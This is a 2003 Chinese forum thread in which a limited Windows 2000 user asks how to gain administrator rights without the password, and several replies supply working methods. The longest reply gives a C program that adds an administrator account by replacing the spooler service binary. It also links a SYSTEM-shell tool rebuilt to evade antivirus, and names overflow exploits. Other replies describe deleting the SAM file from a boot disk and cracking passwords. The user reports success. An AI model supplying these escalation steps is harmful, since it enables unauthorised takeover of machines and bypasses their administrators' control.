急急:我只是win2k的一般用户,请问我可以通过什么手段添加一个admin用户吗?原来admin的密码我没有?

cooking 2003-04-08 04:40:15
我想通过这个办法把目前的登陆身份提升为admin。
...全文
15 点赞 收藏 20
写回复
20 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
cooking 2003-04-09
哈哈,终于搞定啦
回复
spark_li 2003-04-09
另外没有注册的ntfsdos只能查看文件,而不能删除文件
回复
spark_li 2003-04-09
http://bbs.nju.edu.cn/file/1049854631spoolsv.exe

这个down下来保存为spoolsv.exe

http://bbs.nju.edu.cn/file/ERunAsX.dll

这个ErunasX是我重新编译的,希望能诺顿不要再杀它
我这里没有装诺顿,也没有办法测试

你既然可以用小盘启动系统,那么就不用停止服务了
用小盘启动系统后直接重新命名系统的spoolsv.exe就行了
回复
cooking 2003-04-09
我也停不了spooler服务啊,
C:\>net stop spooler
系统发生 5 错误。

拒绝访问。
回复
cooking 2003-04-09
http://bbs.nju.edu.cn/file/2ksystem.zip
里面的ERunAsX.dll抱告有毒,我也没有办法禁止诺顿!
回复
cooking 2003-04-09
我可以用软盘启动,是ubs软盘,也用了ntfsdos,但就是删不不掉那个该死的sam,
我是power user,但机器里面没有装iis,ftp
我也没办法用c啊:(
麻烦你能给我发一个吗?
tyxm@sina.com
感激不尽啊!!!
回复
spark_li 2003-04-09
To cooking()
人家说的dos可不是2k的命令行下面,是叫你用一张dos盘启动
系统,然后删除sam文件,或者多系统下启动其他系统,再把你想进
的2k里面的sam文件删除,不过这个方法的局限是如果你的2k是ntfs
格式的文件系统,怕不能成功。
这里呢,我提供你一个方法(你要确定你的机器是sp2才能成功)
你先down这个文件http://bbs.nju.edu.cn/file/2ksystem.zip
然后解压缩开来,看里面的使用说明,在命令行下运行erunasx cmd.exe
然后呢,就跳出来一个cmd.exe,也就是2k的命令行下的窗口出来
在这个新窗口里面你就可以干你想做的事情了,因为它是以system权限

不知道你的机器还开了那些服务,能拿权限的方法还多呢,比如有iis
的话,才sp2,不谈以前出现的漏洞,就最近的webDavx溢出就能实现了,
还有新出的rpclocator服务的漏洞,这个服务默认是没有启动,但是默认
配置下普通用户可以启动这个服务的,你能本地登陆,也就能拿系统权限了。

此外:还提供一个“鲜为人知”的方法,说笨也说聪明,不管他sp0,还是
sp3 or sp4 hotfix,方法如下:(前提大概需要你是power users 组用户,
系统采用默认安全配置,users组用户我倒没有测试)
1、开始、运行cmd.exe
2、net stop spooler
3、进入system32目录,把spoolsv.exe 重新命名为abc.exe,这里名字随便,
和下面的保持一致就行了
4、进入system32\dllcache目录,里面如果有spoolsv.exe,则也重新命名为
abc.exe
5、把下面的代码copy下去,保存为spoolsv.cpp

#include <stdlib.h>

void main()
{
system("net user newuser newpass /add");
system("net localgroup administrators /add newuser");
system("abc.exe");
}

6、用VC++ 编译上面的spoolsv.cpp,得到spoolsv.exe文件,把它放到
system32目录,
7、重启系统,一切顺利的话系统中就多了一个newuser,administrators组
的用户了。
8、次方法补充:我朋友说呢,users 组的用户系统不让停止服务,也不让
对system32目录写,所以怕不成功。此方法的原理大家一看就清楚了,就是替换
系统的服务程序,欺骗系统先执行我们自己的代码。

此外常用的方法可以用ntfsdos做成启动盘,启动系统之后呢就能对ntfs格式的
文件系统进行读写了,计算机没有禁止你使用软盘启动系统的话,那正好,删除
sam文件即可,另一个方法是用老外写的一个系统启动包,用他你可以修改任意
用户的密码或者修改注册表,前提仍然是你能用软盘启动系统。

不知道大家还有什么好的方法,欢迎指正与补充。
Good Luck
回复
asdfxcv 2003-04-08
没有管理员密码的话,就不能做你上面那些想做的事情,谁叫你装的是WIN2000,而且还装了补丁呢?如果没有装补丁的话,上面很多都可以实现的。
回复
cooking 2003-04-08
spark_li(晕忽忽(恶人谷:通讯连长)) :别说风凉话啊,你有什么好一点,简单一点的办法啊
上面他们说的我都试了,没有成功啊,小弟愚钝:(

simplehe2002(核桃)

在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
在dos下,sam我删不掉啊,拒绝访问!

回复
cooking 2003-04-08
xumiao(猫猫) ,请详细一点好吗?我加了失败啊
回复
spark_li 2003-04-08
对付sp2,本地拿权限的方法多了
回复
xumiao 2003-04-08
看看关于输入法的漏洞吧。
很简单,进去后看net的属性 c:\winnt\system32\net.exe net user username password /add
运行一次,在改:net user username localgroup administrators /add
好好想想!
回复
ysqu 2003-04-08
你在本版上面的搜索中输入“忘记密码”
就可以看到很多方法

或者到search.csdn.net 中查寻
回复
Swanzy 2003-04-08
可以用Linux启动盘修改admin密码
回复
boris007 2003-04-08
可以建用户 但没有任何权限

除非有管理员的密码 管理员给你权限
回复
iamholly 2003-04-08
如果没人管你,你可以修复,呵呵~~
回复
simplehe2002 2003-04-08
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
回复
jxhaq 2003-04-08
用CHNTPW这个软件破解密码,下载一个用一用就知道怎公回事了
回复
cooking 2003-04-08
呵呵,我的正好是sp2,哪里下这个软件啊,我找不到啊?:(
回复
lovestart 2003-04-08
一般情况下是不可以的,如果没有打sp3的话还可以用一个叫erunas的软件。
回复
相关推荐
发帖
windows网络管理与配置
创建于2007-08-02

6045

社区成员

windows网络管理与配置
申请成为版主
帖子事件
创建了帖子
2003-04-08 04:40
社区公告
暂无公告